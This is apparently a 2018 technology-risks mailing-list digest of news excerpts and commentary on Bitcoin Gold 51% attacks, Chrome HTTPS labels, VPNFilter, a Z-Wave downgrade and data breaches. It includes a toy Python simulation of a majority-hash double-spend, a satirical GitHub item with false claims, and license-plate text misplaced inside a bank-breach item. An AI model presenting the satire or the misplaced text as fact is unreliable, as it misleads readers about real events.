    ----------------------------------------------------------------------

    Date: Mon, 4 Jun 2018 10:34:09 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Microsoft to acquire GitHub for $7.5 billion

    via NNSquad
    Microsoft Corp. on Monday announced it has reached an agreement to acquire
    GitHub, the world's leading software development platform where more than
    28 million developers learn, share and collaborate to create the
    future. Together, the two companies will empower developers to achieve
    more at every stage of the development lifecycle, accelerate enterprise
    use of GitHub, and bring Microsoft's developer tools and services to new
    audiences.

    All GitHub users forthwith will be required to run Windows 10 or subsequent
    Microsoft operating systems with all privacy options disabled, manage their
    code only by voice via Cortana, and install the new Microsoft Clippy 2018!
    Microsoft Office Assistant on all of their devices. Microsoft will now scan
    all GitHub materials for patent infringement and turn violators over to
    local authorities for arrest.

    ------------------------------

    Date: Sun, 27 May 2018 14:40:13 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Bitcoin backlash as 'miners' suck up electricity, stress power grids
    in Central Washington (Seattle Times)

    NNSquad
    Bitcoin backlash as ‘miners’ suck up electricity, stress power grids in Central Washington

    But it's not simply the scale of requests that is perplexing utility
    staff. Many would-be miners have no understanding of how large power
    purchases work. In one case this winter, miners from China landed their
    private jet at the local airport, drove a rental car to the visitor center
    at the Rocky Reach Dam, just north of Wenatchee, and, according to Chelan
    County PUD officials, politely asked to see the "dam master because we
    want to buy some electricity." Bitcoin fever has created other,
    smaller-scale problems for the utility. Three times a week, on average,
    utility crews in Chelan County discover unpermitted home miners running
    computer servers far too large for the electrical grids of residential
    neighborhoods. In one instance last year, the transformer outside a
    bootleg miner's home overheated and touched off a grass fire, Chelan
    County PUD officials say.

    Just cut these cryptocurrency mining parasites off. Knock them off the
    grid. If they can generate their own power safely, fine. Otherwise, to hell
    with them.

    ------------------------------

    Date: May 26, 2018 at 8:10:52 AM EDT
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Every cryptocurrency's nightmare scenario is happening to Bitcoin Gold
    (Joon Ian Wong)

    Joon Ian Wong, QZ, 24 May 2018
    Every cryptocurrency’s nightmare scenario is happening to Bitcoin Gold

    Bitcoin Gold is a fork, or spin-off, of the original cryptocurrency,
    bitcoin. It shares much of the same code and works in a similar way to
    bitcoin, with Bitcoin Gold miners contributing computational power to
    process new transactions. That also means it faces the same vulnerabilities
    as bitcoin, but without the protections that come from the large, dispersed
    group of people and organizations whose computers are powering the bitcoin
    blockchain.

    In recent days the nightmare scenario for any cryptocurrency is playing out
    for Bitcoin Gold, as an attacker has taken control of its blockchain and
    proceeded to defraud cryptocurrency exchanges. All the Bitcoin Gold in
    circulation is valued at $786 million, according to data provider
    Coinmarketcap. Blockchains are designed to be decentralized but when an
    individual or group acting in concert controls the majority of a
    blockchain's processing power, they can tamper with transactions and pave
    the way for fraud. This is known as a 51% attack.

    The possibility of a 51% attack has been one of the concerns institutions
    such as banks and tech companies have had over the years about using the
    blockchain for transactions; some have worried that the Chinese government
    could at some point endeavor to do that, ordering all of the Chinese bitcoin
    miners to act in concert. It's unlikely for bitcoin, but for smaller
    cryptocurrencies, 51% attacks are a concern, one dramatized on a recent
    episode of HBO's series Silicon Valley.

    Cryptocurrency miners commit their computer processing power--or hash
    power--to adding new transactions to a coin's blockchain. They are rewarded
    in units of the coin in return. The idea is that these incentives create
    competition among miners to add more hash power to the chain. The more hash
    power is added, the better the chances of winning a reward.

    So what's a 51% attack? It's when a single miner controls more than half of
    the hash power on a particular blockchain. When this happens, that miner can
    mess with transactions in a bunch of ways, including spending coins
    twice. This is the *double-spending problem*, a puzzle surrounding digital
    money that has vexed computer scientists for years -- and which was solved
    by bitcoin. But the solution only holds if no single miner controls the
    majority of the hash power on a chain.

    Bitcoin Gold has been experiencing double-spending attacks for at least a
    week, according to forum posts by Bitcoin Gold director of communications
    Edward Iskra. Someone has taken control of more than half of Bitcoin Gold's
    hash rate and is double-spending coins. Since an attacker must spend coins
    in his or her possession, and can't conjure up new coins, the attack is
    somewhat limited.

    What's happening now, according to Iskra, is that exchanges that
    automatically accept large deposits are being targeted. The fraudster
    deposits Bitcoin Gold into an account at an exchange, where coins are
    traded. Once the exchange credits the Bitcoin Gold to the attacker's
    account, the attacker trades those coins for another cryptocurrency and
    withdraws it. The attacker can repeatedly make deposits of the same Bitcoin
    Gold it deposited in the first exchange and profit in this way.

    A bunch of other cryptocurrencies have been attacked in similar ways
    recently. Something called Verge has been hit twice in the last two months,
    leading to $2.7 million being stolen. The exotic-sounding coins Monacoin and
    Electroneum have also suffered from 51% attacks not too long ago.
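
    The exchange-deposit scenario in the article, as an added toy simulation (example code, not from QZ or Bitcoin Gold): a deposit gets its confirmations on the public chain, the exchange credits it, and then a privately mined chain spending the same coin elsewhere is released. Names, amounts, the fixed six-confirmation policy and the hash-share model are assumptions; difficulty is constant, so the longest chain is also the heaviest.

```python
"""Toy proof-of-work ledger illustrating a 51% double-spend against an
exchange that auto-credits deposits after a fixed number of confirmations.
Constructed example: names, amounts and the hash-share model are assumptions.
"""
import hashlib
import json
import random
from dataclasses import asdict, dataclass

REQUIRED_CONFIRMATIONS = 6  # assumed exchange policy


@dataclass(frozen=True)
class Tx:
    sender: str
    recipient: str
    amount: int
    coin_id: int  # which of the sender's coins is spent; two txs with the same
                  # (sender, coin_id) conflict and cannot both confirm on one chain


@dataclass(frozen=True)
class Block:
    prev_hash: str
    height: int
    txs: tuple

    def hash(self) -> str:
        body = json.dumps({"prev": self.prev_hash, "h": self.height,
                           "txs": [asdict(t) for t in self.txs]}, sort_keys=True)
        return hashlib.sha256(body.encode()).hexdigest()


GENESIS = Block(prev_hash="0" * 64, height=0, txs=())


def extend(chain, txs=()):
    """Return chain plus one block; drop any tx whose coin is already spent."""
    spent = {(t.sender, t.coin_id) for b in chain for t in b.txs}
    valid = tuple(t for t in txs if (t.sender, t.coin_id) not in spent)
    return chain + [Block(chain[-1].hash(), len(chain), valid)]


def confirmations(chain, tx):
    """Blocks from the one holding tx to the tip, inclusive; 0 if absent."""
    for block in chain:
        if tx in block.txs:
            return len(chain) - block.height
    return 0


def select_chain(*candidates):
    """Longest-chain rule: with constant difficulty, longest means most work."""
    return max(candidates, key=len)


def simulate(attacker_share, rounds, seed=1):
    """attacker_share: fraction of total hash power held by the attacker."""
    rng = random.Random(seed)
    deposit = Tx("attacker", "exchange", 100, coin_id=1)
    conflicting = Tx("attacker", "attacker-cold-wallet", 100, coin_id=1)

    public = extend([GENESIS], [deposit])       # honest miners include the deposit
    private = extend([GENESIS], [conflicting])  # attacker spends the same coin
    credited = False
    for _ in range(rounds):
        if rng.random() < attacker_share:       # who finds the next block
            private = extend(private)
        else:
            public = extend(public)
        if confirmations(public, deposit) >= REQUIRED_CONFIRMATIONS:
            credited = True  # exchange lets the attacker trade and withdraw

    final = select_chain(public, private)       # attacker releases private chain
    return {"credited": credited,
            "deposit_survives": confirmations(final, deposit) > 0,
            "public_len": len(public), "private_len": len(private)}


if __name__ == "__main__":
    print("majority attacker:", simulate(0.6, 400))
    print("minority attacker:", simulate(0.3, 400))
```

    With a majority share the exchange has already credited and withdrawn against a deposit that no longer exists on the winning chain; with a minority share the private chain never catches up, which is the protection the article says small coins lack.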

    ------------------------------

    Date: Sat, 26 May 2018 18:03:44 -0600
    From: "Keith Medcalf" <kmed...@dessus.com>
    Subject: Google to remove "secure" indicator from HTTPS pages on Chrome

    Google should be keelhauled for this (or at least the dolts who thought it
    up should be keelhauled, and the sailors doing the hauling should be given
    three toddies of rum when the googlers are half-way along the keel). HTTPS
    does not mean that the Web Site is secure. It means that it is transport
    encrypted. Similarly, that the web site is not using SSL/TLS does not mean
    it is insecure -- it simply means that the transport is not encrypted.

    There is a *LOT* more to being *secure* than merely engaging transport
    security. It should be noted that Google will not detect "forged" or MITM
    certificates, and that as a result much of what they hold out as "secure"
    actually does not even have meaningful transport security.

    ------------------------------

    Date: Fri, 18 May 2018 09:13:42 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Google to remove `secure' indicator from HTTPS pages on Chrome
    (ZDNet)

    [In other news, your local second-level (province, state, prefecture,
    etc.) government announced plans to remove those curve speed caution signs
    to make the roads safer. Well, not actually. They have a bit more sense
    than Google. GW]

    http://www.zdnet.com/article/google-to-remove-secure-indicator-from-https-pages-on-chrome/

    Stephanie Condon, ZDNet, 17 May 2018
    Google to remove "secure" indicator from HTTPS pages on Chrome
    Users should expect the web to be safe by default, Google explained.

    As part of its push to make the web safer, Google on Thursday said it will
    stop marking HTTPS pages as "secure."

    The logic behind the move, Google explained, is that "users should expect
    that the web is safe by default." It will remove the green padlock and
    "secure" wording from the address bar beginning with Chrome 69 in September.

    ------------------------------

    Date: 28 May 2018 11:45:16 -0400
    From: "John Levine" <jo...@iecc.com>
    Subject: Google to remove "secure" indicator from HTTPS pages on Chrome
    (ZDNet)

    Google previously announced that it would mark HTTP pages as "not
    secure" beginning with Chrome 68 in July.

    By October with Chrome 70, Google will start showing a red "not
    secure" warning when users enter data on HTTP pages. "Previously, HTTP
    usage was too high to mark all HTTP pages with a strong red warning,"
    Google said.

    ------------------------------

    Date: Sun, 27 May 2018 08:54:17 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "How your web browser tells you when it's safe" (Gregg Keizer)

    Gregg Keizer, Computerworld, 23 May 2018
    https://www.computerworld.com/artic...your-web-browser-tells-you-when-its-safe.html

    As Google moves to change how its Chrome browser flags insecure websites,
    rival browsers may be forced to follow suit. Here's how other browsers
    currently handle website security and what changes they have coming.

    selected text:

    Google last week spelled out the schedule it will use to reverse years of
    advice from security experts when browsing the Web - to "look for the
    padlock." Starting in July, the search giant will mark insecure URLs in its
    market-dominant Chrome, not those that already are secure. Google's goal?
    Pressure all website owners to adopt digital certificates and encrypt the
    traffic of all their pages.

    Security pros praised Google's campaign, and the probable end-game. "I
    won't have to tell my mom to look for the padlock," said Chester Wisniewski,
    principal research scientist at security firm Sophos, of the
    switcheroo. "She can just use her computer."

    [Let us change stuff for the people who do not know much about computers.
    That will make things simpler for them. These two sentences do not belong
    together.]

    But what are Chrome's rivals doing? Marching in step or sticking to
    tradition? Computerworld fired up the Big Four -- Chrome, Mozilla's Firefox,
    Apple's Safari and Microsoft's Edge -- to find out.

    ------------------------------

    Date: Sun, 27 May 2018 09:07:11 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Smart lock user? Z-wave pairing flaw lets attackers open your doors
    from yards away" (Liam Tung)

    Liam Tung, ZDNet, 25 May 2018
    https://www.zdnet.com/article/smart...ets-attackers-open-your-door-from-yards-away/
    Up to 100 million Internet of Things devices could be at risk.

    starting text:

    Hackers may be able to remotely unlock your smart lock if it relies on the
    Z-Wave wireless protocol.

    According to researchers at UK firm Pen Test Partners, Z-Wave is vulnerable
    to an attack that forces the current secure pairing mechanism, known as S2,
    to an earlier version with known weaknesses, called S0.

    The problem with S0 is that when two devices, like a controller and a smart
    lock, are pairing, it encrypts the key exchange using a hardcoded key
    '0000000000000000'. So, an attacker could capture traffic on the network and
    easily decrypt it to discover the key.

    S2 fixed this problem by employing the Diffie-Hellman algorithm for securely
    sharing secret keys, but the downgrade removes that protection.

    The researchers have posted a video demonstrating the downgrade attack --
    dubbed Z-Shave -- on a Conexis L1 Smart Door Lock from lock manufacture
    Yale. They note that an attacker within about 100 meters could, after the
    downgrade attack, then steal the keys to the smart lock.

    Z-Wave chips are in 100 million smart gadgets, from lights to heating
    systems, but the risk is greater for things with security applications, such
    as locks.

    ------------------------------

    Date: May 27, 2018 at 9:56:50 AM EDT
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: FBI tells router users to reboot now to kill malware infecting 500k
    devices (Dan Goodin)

    Feds take aim at potent VPNFilter malware allegedly unleashed by Russia.
    Dan Goodin, Ars Technica, 25 May 2018

    http://arstechnica.com/information-...t-now-to-kill-malware-infecting-500k-devices/

    The FBI is advising users of consumer-grade routers and network-attached
    storage devices to reboot them as soon as possible to counter
    Russian-engineered malware that has infected hundreds of thousands devices.

    Researchers from Cisco's Talos security team first disclosed the
    existence of the malware on Wednesday. The detailed report said the malware
    infected more than 500,000 devices made by Linksys, Mikrotik, Netgear, QNAP,
    and TP-Link. Known as VPNFilter, the malware allowed attackers to collect
    communications, launch attacks on others, and permanently destroy the
    devices with a single command. The report said the malware was developed by
    hackers working for an advanced nation, possibly Russia, and advised users
    of affected router models to perform a factory reset, or at a minimum to
    reboot. Later in the day, The Daily Beast reported that VPNFilter was indeed
    developed by a Russian hacking group, one known by a variety of names,
    including Sofacy, Fancy Bear, APT 28, and Pawn Storm. The Daily Beast also
    said the FBI had seized an Internet domain VPNFilter used as a backup means
    to deliver later stages of the malware to devices that were already infected
    with the initial stage 1. The seizure meant that the primary and secondary
    means to deliver stages 2 and 3 had been dismantled, leaving only a third
    fallback, which relied on attackers sending special packets to each infected
    device.

    Limited persistence

    The redundant mechanisms for delivering the later stages address a
    fundamental shortcoming in VPNFilter -- stages 2 and 3 can't survive a
    reboot, meaning they are wiped clean as soon as a device is
    restarted. Instead, only stage 1 remains. Presumably, once an infected
    device reboots, stage 1 will cause it to reach out to the recently seized
    ToKnowAll.com address. The FBI's advice to reboot small office and home
    office routers and NAS devices capitalizes on this limitation. In a
    statement published Friday, FBI officials suggested that users of all
    consumer-grade routers, not just those known to be vulnerable to VPNFilter,
    protect themselves. The officials wrote:

    The FBI recommends any owner of small office and home office routers reboot
    the devices to temporarily disrupt the malware and aid the potential
    identification of infected devices. Owners are advised to consider disabling
    remote management settings on devices and secure with strong passwords and
    encryption when enabled. Network devices should be upgraded to the latest
    available versions of firmware.

    In a statement also published Friday, Justice Department officials wrote:

    Owners of SOHO and NAS devices that may be infected should reboot their
    devices as soon as possible, temporarily eliminating the second stage
    malware and causing the first stage malware on their device to call out
    for instructions. Although devices will remain vulnerable to reinfection
    with the second stage malware while connected to the Internet, these
    efforts maximize opportunities to identify and remediate the infection
    worldwide in the time available before Sofacy actors learn of the
    vulnerability in their command-and-control infrastructure.

    The US Department of Homeland Security has also issued a statement advising
    that "all SOHO router owners power cycle (reboot) their devices to
    temporarily disrupt the malware."

    As noted in the statements, rebooting serves the objectives of (1)
    temporarily preventing infected devices from running the stages that collect
    data and other advanced attacks and (2) helping FBI officials to track who
    was infected. Friday's statement said the FBI is working with the non-profit
    Shadow Foundation to disseminate the IP addresses of infected devices to
    ISPs and foreign authorities to notify end users.

    Authorities and researchers still don't know for certain how compromised
    devices are initially infected. They suspect the attackers exploited known
    vulnerabilities and default passwords that end users had yet to patch or
    change. That uncertainty is likely driving the advice in the FBI statement
    that all router and NAS users reboot, rather than only users of the 14
    models known to be affected by VPNFilter [...]

    ------------------------------

    Date: Sun, 27 May 2018 13:25:03 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Banks Adopt Military-Style Tactics to Fight Cybercrime (NYTimes)

    *The New York Times*

    ``Those are the decisions you don't want to be making for the first time
    during a real attack,'' said Bob Stasio, IBM's cyber range operations
    manager and a former operations chief for the National Security Agency's
    cyber center. One financial company's executive team did such a poor job of
    talking to its technical team during a past IBM training drill, Mr. Stasio
    said, that he went home and canceled his credit card with them.

    Like many cybersecurity bunkers, IBM's foxhole has deliberately theatrical
    touches. Whiteboards and giant monitors fill nearly every wall, with
    graphics that can be manipulated by touch.

    ``You can't have a fusion center unless you have really cool TVs,'' quipped
    Lawrence Zelvin, a former Homeland Security official who is now Citigroup's
    global cybersecurity head, at a recent cybercrime conference. ``It's even
    better if they do something when you touch them. It doesn't matter what
    they do. Just something.''

    Security pros mockingly refer to such eye candy as `pew pew' maps, an
    onomatopoeia for the noise of laser guns in 1980s movies and video
    arcades. They are especially useful, executives concede, to put on display
    when V.I.P.s or board members stop by for a tour. Two popular pew maps are
    from FireEye https://www.fireeye.com/cyber-map/threat-map.html and the
    defunct security vendor Norse http://www.norsecorp.com/ whose video
    game-like maps show laser beams zapping across the globe. Norse went out of
    business two years ago, and no one is sure what data the map is based on,
    but everyone agrees that it looks cool.

    http://www.nytimes.com/2018/05/20/business/banks-cyber-security-military.html

    ------------------------------

    Date: Sun, 27 May 2018 16:26:44 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: How One Company Scammed Silicon Valley. And How It Got Caught.
    (John Carreyrou)

    BAD BLOOD
    John Carreyrou
    Secrets and Lies in a Silicon Valley Startup
    352 pp. Alfred A. Knopf. $27.95.
    *The New York Times* Book Review
    http://www.nytimes.com/2018/05/21/books/review/bad-blood-john-carreyro

    "Despite warnings from employees that Theranos wasn't ready to go live on
    human subjects -- its devices were likened to an eighth-grade science
    project -- Holmes was unwilling to disappoint investors or her commercial
    partners. The result was a fiasco. Samples were stored at incorrect
    temperatures. Patients got faulty results and were rushed to emergency
    rooms. People who called Theranos to complain were ignored; employees who
    questioned its technology, its quality control or its ethics were
    fired. Ultimately, nearly a million tests conducted in California and
    Arizona had to be voided or corrected."

    Investors and personalities enamored by technological wizardry, though based
    on fundamentally fraudulent solutions, were suckered in by Theranos' promise
    to revolutionize routine blood tests with a few tiny blood droplets from a
    pinprick. ~US$ 1B dropped on a real "unicorn" sighting.

    The Theranos founder, Elizabeth Holmes, preferred sycophants and colleagues
    who possessed 110-ohm noses (striped brown-brown-brown per the Resistor
    color code) that kissed her fanny. Findings and facts that disputed her
    vision were concealed from investors. Knowing how to ask the right questions
    remains a valuable skill to possess.

    When an ethical, professional engineer confronts a situation of this nature,
    there are few alternatives to pursue: (a) become a whistle-blower; (b)
    continue to document findings that support legal discovery and a fraud
    investigation while holding your nose and tongue; or, (c) jump ship at the
    earliest opportunity.

    If something appears too good to be true, it is likely the case.
    P.T. Barnum, the circus entrepreneur, is reputed to have said, "There's a
    sucker born every minute." An aphorism that remains prescient today for the
    incurious or greedy.

    ------------------------------

    Date: Sun, 27 May 2018 17:30:59 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Jaron Lanier: How Can We Repair The Mistakes Of The Digital Era? (NPR)

    https://www.npr.org/templates/transcript/transcript.php?storyId=6140792

    Get out your checkbook or boost your PayPal account balance. All the free
    services "enjoyed" today, that exploit volunteered information for a little
    dopamine, will shift to a subscription or micropayment model.

    The Internet as a true utility, like the water and power that comes out of
    the wall, billed per bit. Internet disenfranchisement is likely to evolve if
    meter ticks attributed to premium information become unaffordable.

    Will governments introduce a subsidy -- a new entitlement -- to boost the
    information "have-nots" into a realm approximating the "haves"? Or will there
    be a multi-tier model -- surrender your data for 24x7 tracking and attention
    whipsaw for free, versus pay for the right to volunteer data with an
    explicit opt-in (EU ePrivacy) granting license and viewing preferences as
    the product?

    ------------------------------

    Date: Mon, 28 May 2018 08:05:13 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: YouTube stars' fury over algorithm tests (BBC.com)

    http://www.bbc.com/news/technology-44279189

    'Originally, the YouTube subscription feed was a chronological list of
    videos from all the channels that a person had chosen to "subscribe"
    to. The system let people curate a personalised feed full of content from
    their favourite video-makers.

    'However, many video-makers have previously complained that some of their
    videos have not appeared in the subscription feed, and have questioned
    whether YouTube manipulates the list to boost viewer retention and
    advertising revenue.

    'YouTube's latest experiment -- which it said appeared for a "small number"
    of users -- changed the order of videos in the feed. Instead of showing the
    most recent videos at the top, YouTube said the manipulated feed showed
    people "the videos they want to watch".'

    Algorithmic refactoring experiment adjusts video delivery order.
    YouTube apparently 'wins' over content creator/copyright owners,
    despite subscription historical preference and profile settings.

    ------------------------------

    Date: Tue, 29 May 2018 16:10:52 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Amazon Toilet Paper Order of Over $7,000 Refunded 2 Months Later
    (Fortune)

    http://fortune.com/2018/05/25/woman-charged-7000-for-toilet-paper-ordered-amazon-refunded/

    The risk? Online/automated/robot cashiers. Same as my grocery store
    self-checkout charged me for 22 avocados instead of 2. At least I could get a
    quick refund from on-scene humans.

    ------------------------------

    Date: Tue, 29 May 2018 17:14:58 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Amazon's Echo privacy flub has big implications for IT (Evan Schuman)

    Evan Schuman, *Computerworld*, 26 May 2018
    https://www.computerworld.com/artic...privacy-flub-has-big-implications-for-it.html

    Amazon has confirmed that one of its Echo devices recorded a family's
    conversation and then messaged it to a random person on the family's contact
    list. The implications are terrifying.

    ------------------------------

    Date: Tue, 29 May 2018 17:34:18 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Bank of Montreal, CIBC's Simplii Financial report customer data
    breaches" (Asha McLean)

    Asha McLean, ZDNet, 29 May 2018
    http://www.zdnet.com/article/bank-o...lii-financial-confirm-customer-data-breaches/

    Bank of Montreal, CIBC's Simplii Financial report customer data breaches
    The Canadian banks have reported being contacted by external 'fraudsters'
    claiming to have accessed information on an estimated 90,000 customers.

    The trial appears to be limited to 24 plates.

    The plates are digital displays that can be updated and modified remotely.
    Therefore, they can be updated immediately once car registration is updated.
    They can also be used to "broadcast" messages such as emergency and amber
    alerts, and can be set to display personal messages when the car is not in
    motion.

    http://www.dailymail.co.uk/sciencet...l-license-plates-allow-police-track-move.html
    or https://is.gd/NRJ4Ey

    The plates also broadcast information to sensors in or beside roads, and can
    communicate with each other.

    I trust it is not too difficult to point out the huge numbers of ways these
    plates could be attacked or misused.

    Asha McLean, ZDNet, 1 Jun 2018
    CBA sent over 650 emails holding data on 10k customers in error. The bank
    has admitted discovering an issue with emails going to incorrect addresses.
    https://www.zdnet.com/article/cba-sent-over-650-emails-holding-data-on-10k-customers-in-error/

    opening text:

    The Commonwealth Bank of Australia (CBA) has once again found itself in the
    spotlight for the potential mishandling of customer information, admitting
    it had sent over 650 incorrectly addressed internal emails.

    The bank said on Friday it had completed an investigation that was initiated
    after a concern was raised about internal CBA emails being inadvertently
    sent to email addresses using the cba.com domain, prior to taking ownership
    of that domain in April 2017.

    Its usual email domain is cba.com.au.

    ------------------------------

    Date: Thu, 31 May 2018 07:21:49 +0800
    From: Jeremy Ardley <jer...@ardley.org>
    Subject: License Plate Risks

    Two different dynamically changeable number plates.

    The traditional:
    http://www.youtube.com/watch?v=wSFXyIlq5xw

    The $699 plus $7/month electronic paper version issued by the California
    Department of Motor Vehicles:


    I leave it as an exercise for the reader as to what risks exist in
    either. Aside, that is, from pointing out the stupidity of an electronic tag
    in the age of high quality Automatic Number Plate Recognition systems linked
    to a licensing computer.

    However, there is a second risk in being able to detect unlicensed vehicles;
    work overload. The Western Australian Police have had to turn off the
    unlicensed vehicle feature in their ANPR system because there are too many
    alerts!

    "WA Police 'can't cope' with high number of auto-detect car registration
    alerts"

    http://www.abc.net.au/news/2014-06-17/end-of-the-road-for-police-alert-software/5528160

    ------------------------------

    Date: Wed, 30 May 2018 18:37:19 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Jira bug exposed private server keys at major companies,
    researcher finds" (Zack Whittaker)

    Zack Whittaker, ZDNet, 30 May 2018
    https://www.zdnet.com/article/jira-...ver-keys-at-major-companies-researcher-finds/

    Jira bug exposed private server keys at major companies, researcher finds
    A major TV network, a UK cell giant, and one US government agency are among
    the companies affected.

    ------------------------------

    Date: Thu, 31 May 2018 19:39:42 -0400
    From: José María Mateos <ch...@rinzewind.org>
    Subject: Google Started a Political Sh*tstorm Because of Its Over-Reliance
    on Wikipedia (Motherboard)

    https://motherboard.vice.com/en_us/article/435n9j/google-republicans-are-nazis-explanation

    As VICE News reported earlier Thursday, a Google search for `California
    Republican Party' resulted in Google listing `Nazism' as the ideology of the
    party. This happened because of Google's Featured Snippets tool, which pulls
    basic information for search terms and puts it on the front page. These are
    also sometimes called Google Cards and Knowledge Panels.

    The information on these cards is often taken from Wikipedia entries, which
    is what seems to have happened here. Six days ago, someone edited the
    Wikipedia page for `California Republican Party' to include `Nazism',
    something that wasn't changed until Wednesday, Wikipedia's edit logs show.

    You take content from another site and put it into yours and pretend it's
    "the truth", and all that is an automated process. Can't see what might go
    wrong there.

    ------------------------------

    Date: Fri, 01 Jun 2018 15:36:42 -0700
    From: RICHARD M STEIN <rms...@ieee.org>
    Subject: Signs of sophisticated cellphone spying found near White House,
    U.S. officials say (WaPo)

    https://www.washingtonpost.com/news...use-say-u-s-officials/?utm_term=.3cff9618ae33

    "A federal study found signs that surveillance devices for intercepting
    cellphone calls and texts were operating near the White House and other
    sensitive locations in the Washington area last year."

    Only Rip Van Winkle would have been surprised by this headline. What
    precautions are the SIGINT targets using to forestall intercept? Are
    they effective, or have they been compromised too? Whatever happened to
    good ol' "Blackbag" jobs?

    ------------------------------

    Date: Fri, 1 Jun 2018 14:04:19 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Massive Visa Outage Shows the Fragility of Global Payments (WiReD)

    NNSquad
    https://www.wired.com/story/visa-outage-shows-the-fragility-of-global-payments/

    On Friday, VISA'S payment network suffered outages across Europe, limiting
    transactions for both businesses and individuals. Banks and commerce
    groups began advising customers to use cash or other payment cards if
    possible, and reports indicated that online and contactless transactions
    were having more success than chip cards. Though some Visa transactions
    still went through, the failure appeared widespread. The Financial Times
    even reported that some ATMs in the United Kingdom were already out of
    cash within a couple of hours of the first outage reports. Some observers
    saw in the outage a stark reminder of the fragility of payment networks,
    and the weaknesses in global economic platforms.

    ------------------------------

    Date: Sat, 2 Jun 2018 02:01:55 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: How can criminals manipulate cryptocurrency markets?
    (The Conversation)

    https://theconversation.com/how-can-criminals-manipulate-cryptocurrency-markets-97294

    ------------------------------

    Date: Fri, 25 May 2018 18:32:06 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Ad Blocker Ghostery Celebrates GDPR Day by Revealing Hundreds
    of User Email Addresses (Gizmodo)

    via NNSquad [Thanks, EU!]
    http://gizmodo.com/ad-blocker-ghostery-celebrates-gdpr-day-by-revealing-hu-1826338313

    Ad-blocking tool Ghostery suffered from a pretty impressive,
    self-inflicted screwup Friday when the privacy-minded company accidentally
    CCed hundreds of its users in an email, revealing their addresses to all
    recipients. Fittingly, the inadvertent data exposure came in the form of
    an email updating Ghostery users about the company's data collection
    policies. The ad blocker was sending out the message to affirm its
    commitment to user privacy as the European Union's digital privacy law,
    known as the General Data Protection Regulation (GDPR), goes into effect.
    The email arrived in inboxes with the subject line "Happy GDPR Day --
    We've got you covered!" In the body of the email, the company informed
    users, "We at Ghostery hold ourselves to a high standard when it comes to
    users' privacy, and have implemented measures to reinforce security and
    ensure compliance with all aspects of this new legislation."

    ------------------------------

    Date: Sun, 27 May 2018 13:30:02 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Commentary: GDPR Misses the Point (Fortune)

    http://fortune.com/2018/05/24/gdpr-data-privacy-cookies/

    ------------------------------

    Date: Sun, 3 Jun 2018 12:08:40 -0700
    From: "Rob Slade" <rms...@shaw.ca>
    Subject: GDPR, Privacy, and CISSPforum vs "Community"

    The long running CISSPforum mailing list on Yahoo Groups is being closed by
    ISC2, effective June 15, 2018. An alternate mailing list, run by volunteer
    CISSPs, has been created on groups.io.

    Yeah, I know. Those of you who don't have the CISSP cert don't care. (Even
    those who, like Peter, have been given an honorary CISSP may not care.) But
    the reason the CISSPforum is being closed is kind of interesting.

    ISC2 itself isn't saying much about why. But most people discussing it seem
    to think it has to do with GDPR. Yahoo has not had the greatest success
    with security, so ISC2 may wish to limit its exposure.

    The thing is, if I want to give people instructions on getting to the new
    CISSPforum, the easiest thing would be to send them to the page at
    https://community.isc2.org/t5/Welcome/CISSPforum-replacement/td-p/11006 (or
    https://is.gd/lGXNgT if email mungs that and you want a shortened version).
    Yes, you are correct. That Web page is one of the postings on the new,
    supposedly private, "community" that ISC2 has created to replace the
    CISSPforum mailing list as a communications venue for the membership.

    And, if I want to send you to the existing discussion of the various privacy
    issues to do with the new "community," I can point you to
    https://community.isc2.org/t5/Welco...censorship-Closing-of-CISSP/td-p/11021/page/2
    or http://is.gd/GgHckH Or, you can search for it yourself, on Google:
    http://lmgtfy.com/?q=see+the+amazing+dancing+CISSPs+and+all+their+discussions

    You will be able to see all kinds of discussion on the new forum. Do a
    Google search with any term you want, and include site:community.isc2.org as
    a term, and see what the amazing dancing CISSPs have said about it. (There
    is one area of the "community" that is not searchable, but it's fairly
    small.)

    ------------------------------

    Date: Sun, 3 Jun 2018 19:24:04 -0400
    From: José María Mateos <ch...@rinzewind.org>
    Subject: German spy agency can keep tabs on Internet hubs: court (Phys)

    http://phys.org/news/2018-05-german-spy-agency-tabs-internet.html

    De-Cix, the world's largest Internet hub, says Germany's spy agency is able
    to get a complete and unfiltered copy of all data passing through its
    fibre optic cables.

    Germany's spy agency can monitor major Internet hubs if Berlin deems it
    necessary for strategic security interests, a federal court has ruled.

    In a ruling late on Wednesday, the Federal Administrative Court threw out a
    challenge by the world's largest Internet hub, the De-Cix exchange, against
    the tapping of its data flows by the BND foreign intelligence service.

    The operator had argued the agency was breaking the law by capturing German
    domestic communications along with international data.

    http://rinzewind.org/blog-es

    ------------------------------

    Date: Sat, 26 May 2018 13:02:30 -0400
    From: John Ohno <john...@gmail.com>
    Subject: Trendism and cognitive stagnation

    Originally posted here:


    Trendism & cognitive stagnation

    (This is a follow-up to Against Trendism.)

    Basing visibility on popularity is a uniquely awful version of *tyranny of
    the majority* because uncommon views become invisible, even if, were they to
    start on an even playing field, they would become popular.

    In this way, it encourages mental stasis: since ranking is based on an
    immediate appraisal of how popular something already is, and visibility is
    based therefore on past shallow popularity, there's no room for
    rumination.

    This is NOT an attribute of `technology' or `social media', but an attribute
    of visibility systems based on immediate ranking. Visibility systems based
    on ranking delayed by, say, three days, or with the top 25% most popular
    posts elided, would be fine.

    Our capacity to imagine new possibilities is based largely on our
    familiarity with the bounds of possibility space -- we can only
    imagine views that are in the neighborhood of views we've heard
    expressed in the past. So, making the already-unpopular invisible limits
    imagination.

